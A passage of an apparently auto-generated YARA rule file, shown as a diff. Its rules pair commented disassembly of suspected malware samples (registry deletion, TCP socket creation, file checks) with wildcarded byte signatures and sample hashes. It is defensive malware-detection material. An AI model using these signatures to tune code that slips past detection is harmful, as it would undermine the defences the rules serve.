;advapi32.RegDeleteValueA(0xfefefefe,0x0040c030) + .text:0x00401253 8945fc mov dword [ebp - 4],eax + .text:0x00401256 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040125a 7411 jz 0x0040126d + .text:0x0040125c 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040125f 52 push edx + .text:0x00401260 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401266 b801000000 mov eax,1 + .text:0x0040126b eb0c jmp 0x00401279 + .text:0x0040126d loc_0040126d: [1 XREFS] + .text:0x0040126d 8b45f8 mov eax,dword [ebp - 8] + .text:0x00401270 50 push eax + .text:0x00401271 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401277 33c0 xor eax,eax + .text:0x00401279 loc_00401279: [2 XREFS] + .text:0x00401279 8be5 mov esp,ebp + .text:0x0040127b 5d pop ebp + .text:0x0040127c c3 ret + */ + $c59 = { 55 8B EC 83 EC 08 6A 00 8D 45 ?? 50 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 30 C0 40 00 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C3 } + condition: + all of them +} + +rule super_rule_7faaf_b94af +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "7faafc7e4a5c736ebfee6abbbc812d80" + md5 = "b94af4a4d4af6eac81fc135abda1c40c" + strings: + /* +Basic Block at 0x00401b83@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - create TCP socket + .text:0x00401b83 loc_00401b83: [1 XREFS] + .text:0x00401b83 6a06 push 6 + .text:0x00401b85 6a01 push 1 + .text:0x00401b87 6a02 push 2 + .text:0x00401b89 ff1550b14000 call dword [0x0040b150] ;ws2_32.socket(2,1,6) + .text:0x00401b8f 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b92 8901 mov dword [ecx],eax + .text:0x00401b94 8b5508 mov edx,dword [ebp + 8] + .text:0x00401b97 833aff cmp dword [edx],0xffffffff + .text:0x00401b9a 750d jnz 0x00401ba9 + */ + $c60 = { 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? 83 3A FF 75 ?? } + condition: + all of them +} + +rule super_rule_18ec5_7faaf_b94af +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "18ec5becfa3991fb654e105bafbd5a4b" + md5 = "7faafc7e4a5c736ebfee6abbbc812d80" + md5 = "b94af4a4d4af6eac81fc135abda1c40c" + strings: + /* +Basic Block at 0x00401a96@18ec5becfa3991fb654e105bafbd5a4b with 1 features: + - get file attributes + .text:0x00401a96 + .text:0x00401a96 FUNC: int cdecl sub_00401a96( int arg0, int arg1, ) [6 XREFS] + .text:0x00401a96 + .text:0x00401a96 Stack Variables: (offset from initial top of stack) + .text:0x00401a96 8: int arg1 + .text:0x00401a96 4: int arg0 + .text:0x00401a96 + .text:0x00401a96 ff742404 push dword [esp + 4] + .text:0x00401a9a ff1538804000 call dword [0x00408038] ;kernel32.GetFileAttributesA(arg0) + .text:0x00401aa0 83f8ff cmp eax,0xffffffff + .text:0x00401aa3 7511 jnz 0x00401ab6 + */ + $c61 = { FF 74 24 ?? FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? } + /* +function at 0x00401a96@18ec5becfa3991fb654e105bafbd5a4b with 1 features: + - check if file exists + .text:0x00401a96 + .text:0x00401a96 FUNC: int cdecl sub_00401a96( int arg0, int arg1, ) [6 XREFS] + .text:0x00401a96 + .text:0x00401a96 Stack Variables: (offset from initial top of stack) + .text:0x00401a96 8: int arg1 + .text:0x00401a96 4: int arg0 + .text:0x00401a96 + .text:0x00401a96 ff742404 push dword [esp + 4] + .text:0x00401a9a ff1538804000 call dword [0x00408038] ;kernel32.GetFileAttributesA(arg0) + .text:0x00401aa0 83f8ff cmp eax,0xffffffff + .text:0x00401aa3 7511 jnz 0x00401ab6 + .text:0x00401aa5 ff1534804000 call dword [0x00408034] ;ntdll.RtlGetLastWin32Error() + .text:0x00401aab 50 push eax + .text:0x00401aac e806210000 call 0x00403bb7 ;__dosmaperr(kernel32.GetLastError()) + .text:0x00401ab1 59 pop ecx + .text:0x00401ab2 loc_00401ab2: [1 XREFS] + .text:0x00401ab2 83c8ff or eax,0xffffffff + .text:0x00401ab5 c3 ret + .text:0x00401ab6 loc_00401ab6: [1 XREFS] + .text:0x00401ab6 a801 test al,1 + .text:0x00401ab8 741d jz 0x00401ad7 + .text:0x00401aba f644240802 test byte [esp + 8],2 + .text:0x00401abf 7416 jz 0x00401ad7 + .text:0x00401ac1 c705c0ba40000d00 mov dword [0x0040bac0],13 + .text:0x00401acb c705c4ba40000500 mov dword [0x0040bac4],5 + .text:0x00401ad5 ebdb jmp 0x00401ab2 + .text:0x00401ad7 loc_00401ad7: [2 XREFS] + .text:0x00401ad7 33c0 xor eax,eax + .text:0x00401ad9 c3 ret + */ + $c62 = { FF 74 24 ?? FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C8 FF C3 A8 01 74 ?? F6 44 24 ?? 02 74 ?? C7 05 ?? ?? ?? ?? 0D 00 00 00 C7 05 ?? ?? ?? ?? 05 00 00 00 EB ?? 33 C0 C3 } + condition: + all of them +} +